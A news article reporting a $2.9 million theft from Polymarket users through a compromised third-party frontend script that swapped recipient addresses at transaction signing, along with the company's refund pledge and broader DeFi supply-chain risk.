Prediction market Polymarket confirmed a $2.9 million cryptocurrency theft. Attackers injected a malicious script into the platform's frontend through a compromised third-party vendor, draining funds from user wallets in real time. The company has removed the vulnerability and promised full refunds to all affected users.
How the Attack Unfolded
The incident took place on June 25, 2026. Hackers chose a supply chain vector: they compromised a third-party contractor whose JavaScript code was integrated into Polymarket's frontend infrastructure, then planted a malicious script inside that dependency. The script loaded automatically in every visitor's browser and ran during normal use of the platform.
The Polymarket team described the incident as a vendor compromise: the breach originated not in the company's own systems but through one of its technology partners. The team saw no changes in their own repositories, so the vulnerability stayed active for a period of time. The injected script intercepted transaction details in the victim's browser and redirected funds to the attackers' addresses.
This approach is harder to detect than a direct attack. Attackers leave the platform's smart contracts untouched and instead target the software supply chain it relies on. Standard on-chain audits do not cover this type of vector.
Scope of Losses and Affected Assets
The total amount stolen came to $2.9 million. Polymarket is built on the Polygon network and uses USDC as its primary settlement asset for prediction bets. User funds are held in the platform's smart contract and accessed through browser wallet signatures.
The malicious script targeted exactly that signing step. It replaced the recipient address just before confirmation, so victims saw the correct amount while the funds went to the attackers. The company has not disclosed the exact number of affected addresses.
According to Decrypt, Polymarket received the first signal when users reported unauthorized transactions. The team quickly removed the compromised dependency and suspended parts of the infrastructure to audit adjacent components.
Polymarket's Response
After discovering the breach, the platform removed the malicious component, audited adjacent dependencies, and restored normal service. According to the team, there is no remaining risk to user funds.
The decision to refund users was made independently, without regulatory pressure. The payout mechanism and exact timeline have not been announced. The company says it will contact affected addresses directly to confirm the amount of each loss.
- Compromised dependency removed from production infrastructure
- Adjacent components and external SDKs audited
- Refunds will cover 100% of confirmed losses
- Payment timeline is still being finalized
The Supply Chain Threat Is Not Going Away
This incident followed a series of attacks that made Q2 2026 a record quarter for DeFi losses. According to Immunefi, 83 attacks were recorded with combined losses of $755 million. Frontend supply chain vulnerabilities through npm packages and third-party SDKs ranked among the top attack vectors alongside smart contract exploits.
Modern web3 applications depend on hundreds of external libraries. Smart contract audits check on-chain logic but not frontend JavaScript code. Browser clients interact directly with transaction signing requests, which gives frontend injections an entry point that on-chain defenses cannot block.
The practical fix for end users is verifying every transaction on a hardware wallet like Ledger. Signing happens on a separate device, outside the browser, so no malicious script can alter transaction details. It does not eliminate every risk, but it makes frontend injections against such users close to useless.
Polymarket remains one of the largest prediction markets in crypto. Its choice to refund users voluntarily may set a precedent for other DeFi platforms facing similar incidents.
Comments
Your email address will not be published. Required fields are marked *